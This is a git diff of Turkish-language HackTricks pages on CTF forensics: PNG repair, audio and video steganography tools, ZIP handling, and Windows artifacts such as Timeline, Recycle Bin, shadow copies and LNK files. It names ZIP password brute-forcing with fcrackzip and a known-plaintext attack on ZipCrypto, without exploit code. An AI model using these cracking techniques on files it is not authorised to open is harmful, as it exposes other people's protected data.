PNG dosyasının bütünlüğünü kontrol etmek ve bozulmayı onarmak için **pngcheck** adlı önemli bir araç bulunmaktadır. Bu araç, komut satırı işlevselliği sunarak PNG dosyalarını doğrulamak ve teşhis etmek için kullanılır ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Dosyalar basit düzeltmelerin ötesinde ise, [OfficeRecovery'nin PixRecovery](https://online.officerecovery.com/pixrecovery/) gibi çevrimiçi hizmetler, bozulmuş PNG'leri onarmak için web tabanlı bir çözüm sunar ve CTF katılımcılarının önemli verileri kurtarmalarına yardımcı olur.
Bu stratejiler, CTF'lerde gizli veya kayıp verileri ortaya çıkarmak ve kurtarmak için analitik araçlar ve onarım tekniklerinin kapsamlı bir yaklaşımının önemini vurgular.
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip et.**
* **Hacking püf noktalarını paylaşmak için PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
**PNG dosyaları**, **kayıpsız sıkıştırma** özellikleri nedeniyle **CTF zorlukları** için oldukça değerlidir, gizli verilerin gömülmesi için idealdir. **Wireshark** gibi araçlar, PNG dosyalarının ağ paketleri içindeki verilerini analiz ederek gömülü bilgileri veya anormallikleri ortaya çıkarabilir.
PNG dosyalarının bütünlüğünü kontrol etmek ve bozulmayı onarmak için **pngcheck** önemli bir araçtır, PNG dosyalarını doğrulamak ve teşhis etmek için komut satırı işlevselliği sunar ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Dosyalar basit düzeltmelerin ötesinde ise, [OfficeRecovery'nin PixRecovery](https://online.officerecovery.com/pixrecovery/) gibi çevrimiçi hizmetler, **bozuk PNG'leri onarma** konusunda web tabanlı bir çözüm sunar ve CTF katılımcıları için önemli verilerin kurtarılmasına yardımcı olur.
Bu stratejiler, CTF'lerde kapsamlı bir yaklaşımın önemini vurgular, gizli veya kayıp verileri ortaya çıkarmak ve kurtarmak için analitik araçlar ve onarım tekniklerinin bir kombinasyonunu kullanır.

View file

@ -1,41 +1,41 @@
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını göndererek HackTricks ve HackTricks Cloud** github depolarına PR gönderin.
</details>
{% endhint %}
**Ses ve video dosyası manipülasyonu**, gizli mesajları gizlemek veya ortaya çıkarmak için **steganografi** ve meta veri analizini kullanan **CTF forensics zorluklarında** yaygın olarak kullanılan bir tekniktir. **[Mediainfo](https://mediaarea.net/en/MediaInfo)** ve **`exiftool`** gibi araçlar, dosya meta verilerini incelemek ve içerik türlerini belirlemek için önemlidir.
**Ses ve video dosyası manipülasyonu**, **CTF adli bilişim zorlukları** için temel bir konudur, **steganografi** ve metaveri analizi kullanarak gizli mesajları gizlemek veya ortaya çıkarmak için. **[Mediainfo](https://mediaarea.net/en/MediaInfo)** ve **`exiftool`** gibi araçlar, dosya metaverisini incelemek ve içerik türlerini belirlemek için gereklidir.
Ses zorlukları için, metinleri ses içine kodlamak için temel olan dalga formlarını görüntülemek ve spektrogramları analiz etmek için öncü bir araç olan **[Audacity](http://www.audacityteam.org/)** öne çıkar. Ayrıntılı spektrogram analizi için **[Sonic Visualiser](http://www.sonicvisualiser.org/)** şiddetle tavsiye edilir. **Audacity**, gizli mesajları tespit etmek için parçaları yavaşlatma veya tersine çevirme gibi ses manipülasyonuna izin verir. Ses dosyalarını dönüştürme ve düzenleme konusunda **[Sox](http://sox.sourceforge.net/)**, komut satırı yardımcı programı olarak başarılıdır.
Ses zorlukları için, **[Audacity](http://www.audacityteam.org/)**, ses içine kodlanmış metni ortaya çıkarmak için temel olan dalga formlarını görüntüleme ve spektrogramları analiz etme konusunda öne çıkar. Detaylı spektrogram analizi için **[Sonic Visualiser](http://www.sonicvisualiser.org/)** şiddetle tavsiye edilir. **Audacity**, gizli mesajları tespit etmek için parçaları yavaşlatma veya tersine çevirme gibi ses manipülasyonuna izin verir. Ses dosyalarını dönüştürme ve düzenleme konusunda üstün olan bir komut satırı yardımcı programı olan **[Sox](http://sox.sourceforge.net/)** bulunmaktadır.
En az anlamlı bitler (LSB) manipülasyonu, ses ve video steganografisinde yaygın olarak kullanılan bir tekniktir ve verileri gizlice gömmek için medya dosyalarının sabit boyutlu parçalarından yararlanır. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)**, **DTMF tonları** veya **Morse kodu** olarak gizlenmiş mesajları çözmek için kullanışlıdır.
**En Az Anlamlı Bitler (LSB)** manipülasyonu, ses ve video steganografisinde yaygın bir tekniktir, verileri gizlice gömmek için medya dosyalarının sabit boyutlu parçalarını kullanır. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)**, **DTMF tonları** veya **Morse kodu** olarak gizlenmiş mesajları çözmek için kullanışlıdır.
Video zorlukları genellikle ses ve video akışlarını bir araya getiren konteyner formatlarını içerir. Bu formatları analiz etmek ve manipüle etmek için **[FFmpeg](http://ffmpeg.org/)** tercih edilen araçtır ve içeriği çözümlemek ve oynatmak için kullanılabilir. Geliştiriciler için, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)**, FFmpeg'in yeteneklerini Python'a entegre ederek gelişmiş betiklenebilir etkileşimler sağlar.
Video zorlukları genellikle ses ve video akışlarını bir araya getiren konteyner formatlarını içerir. **[FFmpeg](http://ffmpeg.org/)**, bu formatları analiz etmek ve manipüle etmek için başvurulan bir araçtır, içeriği çözümlemek ve oynatmak için uygundur. Geliştiriciler için, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)**, FFmpeg'in yeteneklerini Python'a entegre ederek gelişmiş betiksel etkileşimler sağlar.
Bu araçlar dizisi, ses ve video dosyalarının içinde gizli verileri ortaya çıkarmak için geniş bir analiz ve manipülasyon teknikleri yelpazesini kullanmak zorunda olan CTF zorluklarında gereken çok yönlülüğü vurgular.
Bu araçlar yelpazesi, CTF zorluklarında gereken çok yönlülüğü vurgular, katılımcıların ses ve video dosyaları içindeki gizli verileri ortaya çıkarmak için geniş bir analiz ve manipülasyon teknikleri yelpazesi kullanmaları gerekmektedir.
## Referanslar
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını göndererek HackTricks ve HackTricks Cloud** github depolarına PR gönderin.
</details>
{% endhint %}

View file

@ -1,44 +1,46 @@
# ZIP hileleri
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitimi AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitimi GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* Hacking püf noktalarını paylaşarak PR'ler göndererek [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
**ZIP dosyalarını** yönetmek için **komut satırı araçları**, zip dosyalarını teşhis etmek, onarmak ve kırmak için önemlidir. İşte bazı temel araçlar:
**Komut satırı araçları** zip dosyalarını yönetmek için gereklidir ve zip dosyalarını teşhis etmek, onarmak ve kırmak için kullanılır. İşte bazı temel yardımcı programlar:
- **`unzip`**: Bir zip dosyasının neden açılamadığını ortaya çıkarır.
- **`zipdetails -v`**: Zip dosyası format alanlarının detaylı analizini sunar.
- **`zipinfo`**: Bir zip dosyasının içeriğini çıkarmadan listeler.
- **`unzip`**: Bir zip dosyasının neden açılamayabileceğini ortaya çıkarır.
- **`zipdetails -v`**: Zip dosyası biçim alanlarının detaylı analizini sunar.
- **`zipinfo`**: İçerikleri çıkarmadan bir zip dosyasının içeriğini listeler.
- **`zip -F input.zip --out output.zip`** ve **`zip -FF input.zip --out output.zip`**: Bozuk zip dosyalarını onarmaya çalışır.
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Zip şifrelerini brute-force yöntemiyle kırmak için etkili olan bir araç, genellikle 7 karaktere kadar olan şifreler için kullanılır.
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Zip şifrelerini kaba kuvvet yöntemiyle kırmak için etkili olan bir araç, genellikle yaklaşık 7 karaktere kadar olan şifreler için etkilidir.
[Zip dosya formatı spesifikasyonu](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT), zip dosyalarının yapısı ve standartları hakkında kapsamlı bilgiler sağlar.
[Zip dosya biçimi belirtimi](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT), zip dosyalarının yapısı ve standartları hakkında kapsamlı bilgiler sağlar.
Önemli bir nokta, şifre korumalı zip dosyalarının içindeki dosya adlarını veya dosya boyutlarını **şifrelemediğidir**, bu güvenlik açığı RAR veya 7z dosyalarıyla paylaşılmaz. Ayrıca, eski ZipCrypto yöntemiyle şifrelenen zip dosyaları, sıkıştırılmış bir dosyanın şifrelenmemiş bir kopyası mevcutsa bir **açık metin saldırısına** karşı savunmasızdır. Bu saldırı, zip'in şifresini kırmak için bilinen içeriği kullanır ve bu zayıflık [HackThis'in makalesinde](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) ayrıntılı olarak açıklanmıştır ve [bu akademik makalede](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) daha fazla açıklanmıştır. Bununla birlikte, **AES-256** şifreleme ile korunan zip dosyaları, bu ık metin saldırısına karşı bağışıktır ve hassas veriler için güvenli şifreleme yöntemlerinin seçiminin önemini gösterir.
Önemli bir not olarak, şifre korumalı zip dosyalarının **dosya adlarını veya dosya boyutlarını şifrelemediğini** unutmamak önemlidir; bu, bu bilgileri şifreleyen RAR veya 7z dosyalarıyla paylaşılmayan bir güvenlik açığıdır. Ayrıca, eski ZipCrypto yöntemiyle şifrelenmiş zip dosyaları, sıkıştırılmış bir dosyanın şifresiz bir kopyası mevcutsa **düz metin saldırısına**ıktır. Bu saldırı, zip dosyasının şifresini kırmak için bilinen içeriği kullanır; bu zayıflık [HackThis'in makalesinde](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) detaylı olarak açıklanmış ve [bu akademik makalede](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) daha fazla açıklanmıştır. Bununla birlikte, **AES-256** şifreleme ile korunan zip dosyaları, bu düz metin saldırısına karşı bağışıktır ve hassas veriler için güvenli şifreleme yöntemlerini seçmenin önemini gösterir.
## Referanslar
* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitimi AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitimi GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* Hacking püf noktalarını paylaşarak PR'ler göndererek [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -2,19 +2,20 @@
## Windows Sanal Varlıklar
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olana kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
@ -30,28 +31,25 @@ Bu SQLite veritabanı içinde, ilginç veriler içerebilecek tüm bildirimleri (
### Zaman Çizelgesi
Zaman Çizelgesi, ziyaret edilen web sayfalarının, düzenlenen belgelerin ve yürütülen uygulamaların **zamansal tarihçesini** sağlayan bir Windows özelliğidir.
Zaman Çizelgesi, ziyaret edilen web sayfalarının, düzenlenen belgelerin ve yürütülen uygulamaların **zamansal geçmişini** sağlayan bir Windows özelliğidir.
Veritabanı `\Users\<kullanıcıadı>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db` yolunda bulunur. Bu veritabanı bir SQLite aracıyla veya [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) aracıyla açılabilir **ve 2 dosya oluşturur, bu dosyalar [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) aracıyla açılabilir**.
Veritabanı `\Users\<kullanıcıadı>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db` yolunda bulunur. Bu veritabanı bir SQLite aracıyla veya [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) aracıyla açılabilir **ve 2 dosya oluşturur, bu dosyalar [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) aracıyla açılabilir.**
### ADS (Alternatif Veri Akışları)
İndirilen dosyalar, nasıl indirildiğini gösteren **ADS Zone.Identifier**'ı içerebilir, intranet, internet vb. Dosyanın nereden indirildiğini gösteren **URL** gibi **daha fazla bilgi** içeren bazı yazılımlar (örneğin tarayıcılar) genellikle ekler.
İndirilen dosyalar, nasıl indirildiğini gösteren **ADS Zone.Identifier**'ı içerebilir, örneğin intranet, internet vb. Bazı yazılımlar (tarayıcılar gibi) genellikle dosyanın indirildiği **URL** gibi **daha fazla bilgi** bile ekler.
## **Dosya Yedekleri**
### Geri Dönüşüm Kutusu
Vista/Win7/Win8/Win10'da **Geri Dönüşüm Kutusu** sürücünün kökünde (`C:\$Recycle.bin`) bulunabilir.
Vista/Win7/Win8/Win10'da **Geri Dönüşüm Kutusu**, sürücünün kökünde (`C:\$Recycle.bin`) bulunan **`$Recycle.bin`** klasöründe bulunabilir.\
Bu klasörde bir dosya silindiğinde 2 belirli dosya oluşturulur:
* `$I{id}`: Dosya bilgisi (ne zaman silindiği)
* `$R{id}`: Dosyanın içeriği
![](<../../../.gitbook/assets/image (486).png>)
Bu dosyaları kullanarak silinen dosyaların orijinal adresini ve silindiği tarihi almak için [**Rifiuti**](https://github.com/abelcheung/rifiuti2) aracını kullanabilirsiniz (Vista - Win10 için `rifiuti-vista.exe` kullanın).
Bu dosyaları kullanarak [**Rifiuti**](https://github.com/abelcheung/rifiuti2) aracını kullanarak silinen dosyaların orijinal adresini ve silindiği tarihi alabilirsiniz (Vista - Win10 için `rifiuti-vista.exe` kullanın).
```
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
```
@ -59,7 +57,7 @@ Bu dosyaları kullanarak silinen dosyaların orijinal adresini ve silindiği tar
### Hacim Gölge Kopyaları
Gölge Kopyası, kullanımda oldukları zaman bile bilgisayar dosyalarının veya hacimlerinin **yedek kopyalarını** veya anlık görüntülerini oluşturabilen Microsoft Windows'a dahil edilmiş bir teknolojidir.
Gölge Kopyası, kullanımda oldukları zamanlarda bile bilgisayar dosyalarının veya hacimlerinin **yedek kopyalarını** veya anlık görüntülerini oluşturabilen Microsoft Windows'a dahil bir teknolojidir.
Bu yedeklemeler genellikle dosya sisteminin kökündeki `\System Volume Information` dizininde bulunur ve adları aşağıdaki görüntüde gösterilen **UID'lerden** oluşur:
@ -88,28 +86,28 @@ Bir kabuk öğesi, başka bir dosyaya erişim bilgilerini içeren bir öğedir.
Windows, kullanıcı **bir dosyayı açtığında, kullanırken veya oluşturduğunda** bu **kısayolları otomatik olarak oluşturur**:
* Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
* Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
* Ofis: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
Bir klasör oluşturulduğunda, klasöre, üst klasöre ve büyük üst klasöre bir bağlantı da oluşturulur.
Bu otomatik olarak oluşturulan bağlantı dosyaları, köken hakkında bilgi içerir, dosya mı yoksa klasör mü olduğu, o dosyanın **MAC zamanları**, dosyanın nerede depolandığına dair **hacim bilgileri** ve **hedef dosyanın klasörü**. Bu bilgiler, silinmiş olsalar bile bu dosyaları kurtarmak için faydalı olabilir.
Bu otomatik olarak oluşturulan bağlantı dosyaları, **köken hakkında bilgi içerir** ve eğer bir **dosya** **ise** veya **bir klasör** **ise**, o dosyanın **MAC** **zamanlarını**, dosyanın nerede depolandığına ilişkin **hacim bilgilerini** ve **hedef dosyanın klasörünü** içerir. Bu bilgiler, dosyaların kaldırıldığı durumlarda dosyaları kurtarmak için faydalı olabilir.
Ayrıca, bağlantı dosyasının **oluşturulma tarihi**, orijinal dosyanın **ilk kez kullanıldığı zaman** ve bağlantı dosyasının **değiştirilme tarihi**, orijinal dosyanın **en son ne zaman kullanıldığı** zamanıdır.
Ayrıca, bağlantı dosyasının **oluşturulma tarihi**, orijinal dosyanın **ilk** **kullanıldığı zaman** ve bağlantı dosyasının **değiştirilme tarihi**, orijinal dosyanın **en son** **kullanıldığı zaman** olarak kabul edilir.
Bu dosyaları incelemek için [**LinkParser**](http://4discovery.com/our-tools/) aracını kullanabilirsiniz.
Bu araçta **2 set** zaman damgası bulacaksınız:
* **İlk Set:**
1. Dosya Değiştirme Tarihi
2. Dosya Erişim Tarihi
3. Dosya Oluşturma Tarihi
1. DosyaDeğiştirmeTarihi
2. DosyaErişimTarihi
3. DosyaOluşturmaTarihi
* **İkinci Set:**
1. Bağlantı Değiştirme Tarihi
2. Bağlantı Erişim Tarihi
3. Bağlantı Oluşturma Tarihi.
1. BağlantıDeğiştirmeTarihi
2. BağlantıErişimTarihi
3. BağlantıOluşturmaTarihi.
İlk zaman damgası seti **dosyanın zaman damgalarına** referans verir. İkinci set, **bağlı dosyanın zaman damgalarına** referans verir.
İlk zaman damgası seti, **dosyanın kendi zaman damgalarına** referans verir. İkinci set, **bağlı dosyanın zaman damgalarına** referans verir.
Aynı bilgilere erişmek için Windows CLI aracını çalıştırabilirsiniz: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
```
@ -117,11 +115,11 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
```
### Jumplists
